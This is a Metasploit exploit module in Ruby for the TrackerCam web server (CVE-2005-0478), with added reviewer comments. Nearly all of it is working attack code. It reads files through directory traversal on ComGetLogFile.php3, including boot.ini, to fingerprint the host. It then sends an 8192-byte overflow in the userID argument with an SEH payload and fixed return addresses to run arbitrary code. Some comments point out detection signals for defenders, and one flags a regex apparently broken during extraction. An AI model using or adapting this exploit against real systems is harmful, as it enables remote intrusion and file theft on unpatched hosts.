require 'msf/core'

module Msf

# Metasploit module for the TrackerCam web server (2005 advisory; see the
# References list below). It combines two issues visible in this file:
#   * a directory-traversal read through /tuner/ComGetLogFile.php3?fn=...
#     (used by #check, #download and #fingerprint to read files off the host)
#   * a stack overflow in the userID argument of /tuner/TunerGuide.php3
#     (used by #exploit, with an SEH-style payload from the Seh mixin)
# Both request shapes are the observable artifacts a defender can alert on:
# a traversal sequence ("../") in the fn= parameter, and a multi-kilobyte
# userID value in a single request.
class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote

	include Exploit::Remote::HttpClient
	include Exploit::Remote::Seh

	# Registers module metadata (name, references, payload constraints,
	# per-target return addresses) and the default HTTP port (8090).
	#
	# @param info [Hash] metadata merged by update_info; callers normally pass {}
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TrackerCam PHP Argument Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '13953'],
					[ 'OSVDB', '13955'],
					[ 'CVE', '2005-0478'],
					[ 'BID', '12592'],
					[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],
					[ 'MIL', '69'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Payload is placed inside a URL query argument, so the excluded
					# bytes are the ones that would break the request or the
					# argument parsing (NUL, whitespace, URL metacharacters).
					'Space'    => 2048,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# EyeWD.exe has a null and we can not use a partial overwrite.
					# All of the loaded application DLLs have a null in the address,
					# except CPS.dll, which moves around between instances :-(
					# Each 'Ret' is a fixed, OS/SP-specific address; #fingerprint
					# exists so the operator can pick the matching target, and a
					# mismatch will most likely just crash the service (a DoS signal
					# worth watching for on the defender side).
					['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
					# Windows XP SP2 and Windows 2003 are not supported yet :-/
				],
			'DisclosureDate' => 'Feb 18 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8090)
			], self.class)
	end

	# Vulnerability check. This is NOT passive: it uses the traversal flaw to
	# read ../HTTPRoot/socket.php3 from the server and looks for "fsockopen"
	# in the body. On a hit it also runs #fingerprint (two more traversal
	# reads) purely for the status message.
	#
	# @return [Exploit::CheckCode] Confirmed when the marker is found, else Safe
	def check
		c = connect
		req = c.request({
			'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3'
		})
		res = c.send_request(req, -1)
		if (res and res.body =~ /fsockopen/)
			# fingerprint may return nil (see its early returns); the message
			# then reads "... installation on " with nothing after it.
			fp = fingerprint()
			print_status("Detected a vulnerable TrackerCam installation on #{fp}")
			return Exploit::CheckCode::Confirmed
		end
		return Exploit::CheckCode::Safe
	end

	# Sends the overflow request: an 8192-byte filler in the userID query
	# argument with the SEH payload (from generate_seh_payload) written in
	# at byte offset 257, then starts the payload handler and disconnects.
	#
	# @return [void]
	def exploit
		c = connect
		buf = Rex::Text.rand_text_english(8192)
		seh = generate_seh_payload(target.ret)
		# Overwrite a slice of the filler in place; buf stays 8192 bytes long.
		buf[257, seh.length] = seh
		uri = "/tuner/TunerGuide.php3?userID=#{buf}"
		print_status("Sending request...")
		# The response is assigned but never inspected; nothing here tells the
		# operator whether the request was accepted or the service crashed.
		res = c.send_request(c.request({ 'uri' => uri }), -1)
		handler
		disconnect
	end

	# Reads a file from the target through the ComGetLogFile.php3 traversal
	# (ten "../" segments prepended to +path+) and returns the text between
	# the start of the body and the closing </pre></body>.
	#
	# @param path [String] path relative to the traversed-to root
	# @return [String, nil] captured body text, or nil when there is no
	#   response, the page markers are absent, or the capture regex fails
	def download(path)
		c = connect
		req = c.request({
			'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path
		})
		res = c.send_request(req, -1)
		# NOTE(review): the second regex below contains a literal newline
		# between its slashes. That looks like an extraction artifact (an HTML
		# tag that was stripped from the listing) rather than intent — confirm
		# against the original source before relying on this guard.
		return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /
/)
		# Greedy, multi-line capture of everything before the closing markers.
		m = res.match(/(.*)<\/pre><\/body>/smi)
		return if not m
		return m[1]
	end

	# Best-effort OS/service-pack guess used only for the #check status line.
	# It requests a random non-existent .txt file to provoke a PHP error
	# that leaks the install path, then reads boot.ini from the same drive
	# and pattern-matches its contents. Every step bails out with nil.
	#
	# @return [String, nil] a label such as "Windows XP SP0-SP1", or nil when
	#   the path could not be read or is not on the C: drive
	def fingerprint
		res = download(Rex::Text.rand_text_alphanumeric(12) + '.txt') || return
		m = res.match(/in (.*)<\/b> on line/smi)
		return if not m
		path = m[1]
		print_status("TrackerCam installation path is #{path}")
		# ^ anchors a line start, not the string start; with a single-line
		# path this is equivalent to \A, which is what is meant here.
		if (path !~ /^C/i)
			print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")
			return
		end
		if (path !~ /Program Files/i)
			print_status("TrackerCam is installed in a non-standard location")
		end
		# boot.ini is reached via the ten-level traversal in #download, so the
		# assumption is that it sits at the root of the drive the server runs on.
		boot = download('boot.ini') || return
		case boot
		when /Windows XP.*NoExecute/i
			# NoExecute in boot.ini is taken as the XP SP2 (DEP) marker, which
			# the Targets list does not support.
			return "Windows XP SP2+"
		when /Windows XP/
			return "Windows XP SP0-SP1"
		when /Windows.*2003/
			return "Windows 2003"
		when /Windows.*2000/
			return "Windows 2000"
		else
			return "Unknown OS/SP"
		end
	end
end
end